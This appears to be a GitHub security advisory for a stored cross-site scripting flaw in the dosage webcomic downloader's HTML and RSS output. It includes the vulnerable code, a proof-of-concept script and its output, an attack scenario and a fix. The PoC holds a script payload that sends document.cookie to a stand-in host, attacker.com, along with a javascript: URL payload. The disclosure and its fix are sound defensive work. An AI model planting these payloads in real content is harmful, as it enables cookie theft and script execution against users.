
Dosage Vulnerable to Stored Cross-Site Scripting (XSS) in HTML/RSS Output Handlers

Moderate severity GitHub Reviewed Published May 24, 2026 in webcomics/dosage • Updated Jun 26, 2026

Package

dosage (pip)

Affected versions

<= 3.2

Patched versions

3.3

Description

Summary

The HTML and RSS output handlers in dosagelib/events.py write user-controlled content (comic text and page URLs) directly into generated files without proper HTML escaping. When a user scrapes a malicious webcomic and opens the generated HTML/RSS file, attacker-controlled JavaScript can execute in their browser.

CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)


Details

Vulnerable Code Locations

The vulnerability exists in dosagelib/events.py where untrusted content is written to HTML/RSS output without escaping:

1. RSSEventHandler (lines 116-118)

# events.py:116-118
if comic.text:
    description += '<br/>%s' % comic.text        # ← Unescaped comic.text
description += '<br/><a href="%s">View Comic Online</a>' % pageUrl  # ← Unescaped URL

2. HtmlEventHandler (lines 232, 238)

# events.py:232
self.html.write(u'<li><a href="%s">%s</a>\n' % (pageUrl, pageUrl))  # ← Unescaped URL

# events.py:238
if text:
    self.html.write(u'<br/>%s\n' % text)  # ← Unescaped text

Root Cause

  • BasicScraper.fetchText() in scraper.py:422 calls html.unescape() on extracted text
  • The output handlers never call html.escape() before writing to files
  • No sanitization of URLs or text content occurs anywhere in the output pipeline
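The interaction between the first two points can be reproduced with the standard library alone. The following is a minimal sketch, not dosage code: `render_item` is a hypothetical stand-in for the handlers' `'<br/>%s'` string formatting, and the `scraped` value is an assumed example of entity-encoded markup on a comic page.

```python
import html

# Entity-encoded payload as it might appear in page markup (inert as written).
scraped = "Funny!&lt;script&gt;alert(1)&lt;/script&gt;"

# The advisory states that fetchText() calls html.unescape() on extracted text,
# which turns the entities back into live markup characters.
text = html.unescape(scraped)


def render_item(text: str, escape: bool) -> str:
    """Hypothetical stand-in for the handler's '<br/>%s' formatting."""
    return "<br/>%s\n" % (html.escape(text) if escape else text)


vulnerable = render_item(text, escape=False)  # mirrors the unescaped write
patched = render_item(text, escape=True)      # mirrors the recommended fix

print(vulnerable, end="")
print(patched, end="")
```

The first printed line contains a real `<script>` element; the second contains only `&lt;script&gt;` text, which a browser displays rather than executes.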

Data Flow

Malicious webcomic page
    ↓
textSearch XPath extracts content (e.g., img/@title, div text)
    ↓
BasicScraper.fetchText() calls html.unescape()
    ↓
comic.text stored without sanitization
    ↓
HtmlEventHandler/RSSEventHandler writes to file without html.escape()
    ↓
Generated HTML/RSS contains executable JavaScript

PoC

I created a proof-of-concept that demonstrates the vulnerability by simulating a malicious comic source.

Prerequisites

  • Docker installed and running

PoC Files

Create these files in a poc/ directory:

1. poc/Dockerfile

FROM python:3.11-slim

LABEL description="PoC for dosage Stored XSS vulnerability (CWE-79)"

WORKDIR /app
COPY . /app

# Install dependencies
RUN pip install --no-cache-dir --quiet imagesize lxml requests rich platformdirs

# Install dosage
ENV SETUPTOOLS_SCM_PRETEND_VERSION_FOR_DOSAGE=0.0.0
RUN pip install --no-cache-dir --quiet .

CMD ["python", "poc/poc.py"]

2. poc/poc.py

#!/usr/bin/env python3
"""
PoC: Stored XSS in dosage HTML/RSS Output Handlers
Demonstrates that untrusted comic content is written to output files unescaped.
"""

import sys
from pathlib import Path
from types import SimpleNamespace

from dosagelib.events import HtmlEventHandler, RSSEventHandler

# XSS payloads simulating malicious webcomic content
MALICIOUS_TEXT = "Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>"
MALICIOUS_URL = "javascript:alert('XSS-via-URL')"

def check_vulnerability(content: str, marker: str, description: str) -> bool:
    """Check if unescaped marker appears in content."""
    if marker.lower() in content.lower():
        print(f"  [VULNERABLE] {description}")
        print(f"               Found unescaped: {marker}")
        return True
    print(f"  [SAFE] {description}")
    return False

def main():
    print("=" * 70)
    print("PoC: Stored XSS in dosage HTML/RSS Output Handlers")
    print("=" * 70)
    print()

    base = Path(__file__).parent / "output"
    base.mkdir(parents=True, exist_ok=True)

    # Create dummy image file
    img_path = base / "payload.png"
    img_path.write_bytes(b"\x89PNG\r\n\x1a\n")

    # Simulate comic with malicious content
    comic = SimpleNamespace(
        scraper=SimpleNamespace(name="MaliciousComic"),
        referrer=MALICIOUS_URL,
        text=MALICIOUS_TEXT,
        url="http://example.com/comic.png"
    )

    vulnerabilities_found = 0

    # Test RSS Handler
    print("[*] Testing RSSEventHandler...")
    rss_handler = RSSEventHandler(str(base), None, False)
    rss_handler.start()
    rss_handler.comicDownloaded(comic, str(img_path))
    rss_handler.end()
    
    rss_path = Path(rss_handler.rssfn)
    rss_content = rss_path.read_text(encoding="utf-8")
    print(f"    Output file: {rss_path}")
    
    if check_vulnerability(rss_content, "javascript:", "pageUrl in RSS href"):
        vulnerabilities_found += 1

    # Test HTML Handler  
    print()
    print("[*] Testing HtmlEventHandler...")
    html_handler = HtmlEventHandler(str(base), None, False)
    html_handler.start()
    html_path = Path(html_handler.html.name)
    html_handler.comicDownloaded(comic, str(img_path), text=MALICIOUS_TEXT)
    html_handler.end()

    html_content = html_path.read_text(encoding="utf-8")
    print(f"    Output file: {html_path}")
    
    if check_vulnerability(html_content, "<script>", "text param in HTML"):
        vulnerabilities_found += 1
    if check_vulnerability(html_content, "javascript:", "pageUrl in HTML link"):
        vulnerabilities_found += 1

    # Show vulnerable content
    print()
    print("-" * 70)
    print("Vulnerable Content in Generated HTML:")
    print("-" * 70)
    for line in html_content.splitlines():
        if "<script>" in line.lower() or "javascript:" in line.lower():
            print(f"  {line}")

    print()
    print("=" * 70)
    print(f"RESULT: {vulnerabilities_found} XSS vulnerability vectors confirmed!")
    print("=" * 70)
    
    return 0 if vulnerabilities_found > 0 else 1

if __name__ == "__main__":
    sys.exit(main())

3. poc/run_poc.sh

#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
ROOT_DIR="$(cd "${SCRIPT_DIR}/.." && pwd)"

echo "[*] Building PoC Docker image..."
docker build -t dosage-xss-poc -f "${SCRIPT_DIR}/Dockerfile" "${ROOT_DIR}" --quiet

echo "[*] Running PoC..."
docker run --rm dosage-xss-poc

echo "[*] Cleanup: docker rmi dosage-xss-poc"

Running the PoC

cd /path/to/dosage
chmod +x poc/run_poc.sh
./poc/run_poc.sh

PoC Output

======================================================================
PoC: Stored XSS in dosage HTML/RSS Output Handlers
======================================================================

[*] Testing RSSEventHandler...
    Output file: /app/poc/output/dailydose.rss
  [VULNERABLE] pageUrl in RSS href
               Found unescaped: javascript:

[*] Testing HtmlEventHandler...
    Output file: /app/poc/output/html/comics-20251210.html
  [VULNERABLE] text param in HTML
               Found unescaped: <script>
  [VULNERABLE] pageUrl in HTML link
               Found unescaped: javascript:

----------------------------------------------------------------------
Vulnerable Content in Generated HTML:
----------------------------------------------------------------------
  <li><a href="javascript:alert('XSS-via-URL')">javascript:alert('XSS-via-URL')</a>
  <br/>Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>

======================================================================
RESULT: 3 XSS vulnerability vectors confirmed!
======================================================================

The output shows that:

  1. The javascript: URL is written directly into <a href> attributes
  2. The <script> tag from comic text appears unescaped in the HTML body
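The PoC detects these cases with a substring match, which would also fire on text that has been escaped correctly (for example, `javascript:` shown as link text). As a complementary check, the sketch below parses the generated markup and reports only real `<script>` elements and links whose scheme is not http or https. The `OutputAuditor` class and `audit` function are hypothetical names introduced for illustration; they are not part of dosage or the PoC.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class OutputAuditor(HTMLParser):
    """Collects <script> elements and links with a non-http(s) scheme."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        elif tag == "a":
            href = (dict(attrs).get("href") or "").strip()
            scheme = urlsplit(href).scheme.lower()
            # An empty scheme means a relative link, treated as acceptable here.
            if scheme not in ("", "http", "https"):
                self.findings.append("unsafe href: %s" % href)


def audit(content: str) -> list:
    """Return a list of findings for one generated HTML document."""
    auditor = OutputAuditor()
    auditor.feed(content)
    auditor.close()
    return auditor.findings


# The two vulnerable lines from the PoC output above.
vulnerable = (
    "<li><a href=\"javascript:alert('XSS-via-URL')\">"
    "javascript:alert('XSS-via-URL')</a>\n"
    "<br/>Funny Comic!<script>fetch('http://attacker.com/?c='"
    "+document.cookie)</script>\n"
)
# The same comic text after html.escape(): no live markup remains.
escaped = "<br/>Funny Comic!&lt;script&gt;alert(1)&lt;/script&gt;\n"

print(audit(vulnerable))
print(audit(escaped))
```

A structural check like this keeps reporting the `javascript:` link until the URL scheme itself is validated, because escaping alone leaves the `href` value functional.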

Impact

Who is affected?

  • Users who run dosage with the --output html or --output rss option
  • Anyone who opens the generated HTML files in a browser, or the RSS feed in a reader that renders item descriptions as HTML

Attack scenario

  1. Attacker creates or compromises a webcomic site
  2. Attacker injects JavaScript into image title/alt attributes:
    <img src="comic.png" title="Funny!<script>alert(1)</script>">
  3. Victim runs: dosage MaliciousComic --output html
  4. The generated Comics/html/comics-YYYYMMDD.html contains the unescaped script
  5. When victim opens the file, JavaScript executes

Potential consequences

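  • Theft of cookies or other origin-scoped data if the generated files are served from a web server
  • Possible access to other local files when the output is opened via file://, depending on how the browser restricts file: origins
  • Phishing attacks through DOM manipulation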

Recommended Fix

Escape all user-controlled content before writing to HTML/RSS:

import html

# In RSSEventHandler.comicDownloaded() - events.py around line 116:
if comic.text:
    description += '<br/>%s' % html.escape(comic.text)
description += '<br/><a href="%s">View Comic Online</a>' % html.escape(pageUrl)

# In HtmlEventHandler.comicDownloaded() - events.py around line 232:
self.html.write(u'<li><a href="%s">%s</a>\n' % (html.escape(pageUrl), html.escape(pageUrl)))

# events.py around line 238:
if text:
    self.html.write(u'<br/>%s\n' % html.escape(text))

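Note that html.escape() only neutralizes markup characters; a javascript: URL contains none, so it passes through escaping unchanged and remains executable when placed in an href. URLs should therefore also be validated against an allowlist of safe schemes (http, https) before they are written.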
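One way to combine both measures is sketched below. This is an illustration under stated assumptions rather than the patch shipped in 3.3: `safe_href`, `render_link`, `ALLOWED_SCHEMES`, and the `"#"` fallback are hypothetical names and choices introduced here.

```python
import html
from urllib.parse import urlsplit

# Assumption: only these schemes are considered safe for generated links.
ALLOWED_SCHEMES = {"http", "https"}


def safe_href(url: str, fallback: str = "#") -> str:
    """Return an attribute-safe URL, or `fallback` if the scheme is not allowed."""
    url = url.strip()
    try:
        scheme = urlsplit(url).scheme.lower()
    except ValueError:
        # urlsplit() rejects some malformed inputs; treat them as unsafe.
        return fallback
    if scheme not in ALLOWED_SCHEMES:
        return fallback
    # quote=True also escapes double and single quotes for attribute context.
    return html.escape(url, quote=True)


def render_link(page_url: str) -> str:
    """Hypothetical replacement for the '<li><a href=...>' write."""
    return '<li><a href="%s">%s</a>\n' % (safe_href(page_url), html.escape(page_url))


print(render_link("javascript:alert('XSS-via-URL')"), end="")
print(render_link('https://example.com/comic?a=1&b="x"'), end="")
```

Replacing a rejected URL with an inert fallback keeps the list item visible while removing the executable link; dropping the link entirely would be an equally reasonable design.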



TobiX published to webcomics/dosage May 24, 2026
Published to the GitHub Advisory Database Jun 26, 2026
Reviewed Jun 26, 2026
Last updated Jun 26, 2026

Severity

Moderate


CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
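The numeric score is not present in this text, but it can be derived from the vector string. The sketch below applies the CVSS v3.1 base score equations and metric weights as published in the FIRST specification; the function names are chosen here for illustration, and the result is a computed value rather than a figure quoted from the advisory.

```python
import math

# Metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when Scope is Changed.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score for a vector string."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    iss = 1 - (
        (1 - WEIGHTS["C"][metrics["C"]])
        * (1 - WEIGHTS["I"][metrics["I"]])
        * (1 - WEIGHTS["A"][metrics["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    exploitability = (
        8.22 * WEIGHTS["AV"][metrics["AV"]] * WEIGHTS["AC"][metrics["AC"]]
        * pr * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if changed else total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"))  # 6.1
```

A base score of 6.1 falls in the 4.0 to 6.9 band, which is consistent with the Moderate severity listed above.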

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-75mw-h36v-2jv7
